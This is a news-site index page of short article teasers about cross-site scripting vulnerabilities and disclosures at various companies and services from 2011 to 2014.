Articles about xss

Researcher details nasty XSS flaw in popular web editor

A tool that's popular with Microsoft's in-house developers, the RadEditor HTML editor, contains a dangerous cross-site scripting (XSS) vulnerability, researcher GS McNamara says. The editor was developed by Telerik and used in trusted in-house code in many big enterprises and across Redmond products including MSDN, CodePlex, …
Darren Pauli, 1 Oct 2014

Who.is does the Harlem Shake

Websites across the internet are doing the Harlem Shake after online comedians began exploiting cross site scripting (XSS) flaws that make pages dance and speakers blare. The flaws exist in the DNS text record – not the protocol – due to a lack of sanitation, and allowed internet scamps to turn boring websites like Who.is into …
Darren Pauli, 22 Sep 2014
Fail and You

Vid shows how to easily hack 'anti-spy' webmail (sorry, ProtonMail)

Video + Update A security researcher has demonstrated a classic JavaScript-injection attack against ProtonMail – the webmail system developed by boffins and CERN to withstand surveillance by the world's intelligence agencies. German security expert Thomas Roth published a video over the weekend showing how he exploited a trivial …
Iain Thomson, 7 Jul 2014
Fail whale

TweetDeck XSS flap: Miscreants flash their naughty bits at users

Updated Twitter aficionados are being warned to log out of Twitter client TweetDeck and revoke its access to their accounts after an apparent cross-site scripting vulnerability was discovered. Multiple users – including El Reg's HQ in London, England – reported on Wednesday that they had seen a suspicious pop-up within Tweetdeck that …
Jack Clark, 11 Jun 2014
Google's XSS game

Google launches hacker game to train bug 'mercenaries'

Google wants to bring new blood into the security bug hunter community with a game launched to test developers' knowledge of cross site scripting (XSS) vulnerabilities. The XSS Game put devs through six games of increasing complexity that required successful attacks against mock vulnerable web applications. "The game is …
Darren Pauli, 30 May 2014
Trolls

Yahoo! Saves! Trolls! From! Session! Jacking! Holes!

Yahoo! has patched a cross site scripting (XSS) flaw in the commenting system it uses across many of its properties. The internet giant squished two attack vectors affecting a laundry list of Yahoo! services covering topics as diverse as shopping and sport two weeks after they were reported on May 2nd. Californian web dev and …
Darren Pauli, 20 May 2014
Zombie cloud

Innocent surfers drafted into ZOMBIE ARMY by sneaky XSS vuln

Visitors to a video distribution website were unwittingly turned into participants in a hacker's DDoS battle against a third-party site earlier this month. DDoS mitigation firm Incapsula identified the video website as Sohu.TV, after the Chinese streaming site plugged a vuln that enabled the browser-based botnet attack to …
John Leyden, 25 Apr 2014

ICO plugs XSS vuln in its website. Only took watchdog FIVE YEARS

The Information Commissioner's Office (ICO) has finally fixed a security bug on its website - five years after it was first notified to the data privacy watchdog. IT consultant Paul Moore first warned the ICO about a cross site scripting (XSS) problem on its website in 2009. The flaw meant it was possible to introduce …
John Leyden, 28 Mar 2014

RoR Paperclip infested by content type spoofing bug

Ruby on Rails developers using the Paperclip uploader to receive files need to update to a new version, after a developer turned up an XSS bug in the software that could possibly be extended to remote code execution. The new version, here, implements stricter incoming file typing to eliminate the bug. What Egor Homakov …
The Register breaking news

Ubuntu puts forums back online, reveals autopsy of a brag hacker

Ubuntu Forums are back to normal following a serious hack attack that exposed the usernames, email addresses and hashed passwords of 1.8 million open source users. Parent firm Canonical restored the forums on Tuesday as well as publishing a detailed summary of what went wrong and the broad steps it has taken to beef up …
John Leyden, 2 Aug 2013
The Register breaking news

The Grauniad corrects an error on its website

The Guardian has fixed a minor cross-site scripting vulnerability on its website. The flaw, discovered and responsibly disclosed by security researcher Pete Houghton, occurred at the worst possible place on the UK broadsheet's website - right on its login page. Readers use the page to log in and comment on stories. In theory …
John Leyden, 19 Jul 2013
The Register breaking news

PayPal denies stiffing bug-hunting teen on bounty

PayPal has denied that it refused a teenage security researcher a reward for finding a potentially nasty bug on the basis that he was too young. The payments processing firm said that while it had denied the 17-year-old a reward, it was because another researcher had already reported the flaw. Robert Kugler, 17, found a cross- …
John Leyden, 30 May 2013
The Register breaking news

Filthy! old! blog! bug! blamed! for! Yahoo! webmail! hijacks!

Yahoo! webmail accounts are being hijacked by hackers exploiting an eight-month-old bug in the web giant's blog, security biz Bitdefender warns. Messages with a short link to an apparently harmless MSNBC web-page are being spread to compromise mailboxes: the link actually points to a completely different website hosting …
John Leyden, 1 Feb 2013
The Register breaking news

Yahoo! email! hijack! exploit!... Yours! for! $700!

A cross-site scripting (XSS) flaw on Yahoo! Mail creates a means to steal cookies and hijack accounts, according to a hacker who is offering to sell an alleged zero-day vulnerability exploit for $700. The cybercrook, who uses the online nickname TheHell, knocked up a video to market the exploit which he is attempting to sell …
John Leyden, 27 Nov 2012
The Register breaking news

eBay: It's safe to buy busted lava lamps and bug-infested rugs again

eBay has resolved a cross-site scripting bug on its website that independent experts warned posed a significant risk of fraud to users of the auction site. The XSS flaw meant that, once logged into a seller account on eBay, an attacker could insert an XSS exploit code into a listing of an item for sale. The XSS security flaw …
John Leyden, 22 Nov 2012
The Register breaking news

Chick-lit star snubs Menshn.com password flaw alert

Updated A security researcher has warned of new vulnerabilities in Tory MP and former chick-lit queen Louise Mensch's three-month-old chatroom-cum-microblogging service. A "trivial" CSRF attack (‪cross-site request forgery‬) can change a Menshn.com user's password, according to developer Danny Moules. El Reg has seen proof-of-concept …
John Leyden, 5 Sep 2012
The Register breaking news

Security still slack in WA government agencies

While not as utterly hopeless as last year, IT security is still troublesome in Western Australia’s government agencies. In last year’s annual audit, the Auditor General strolled through fourteen agency networks in an undetected penetration test. This year, the auditor’s staff have looked at payment security in nine agencies, …
The Register breaking news

'Self-aware' bank account robbing code unleashed by hacker

A hacker has published code for potent cross-site scripting attacks that he claims go beyond the usual cookie stealing and phishing for users' private details. Cross-site scripting (XSS) flaws allow attackers to present content under their control in the context of a vulnerable yet trusted site, thus tricking marks into …
John Leyden, 16 Dec 2011

Create a news alert about xss, or find more stories about xss.

Biting the hand that feeds IT © 1998–2018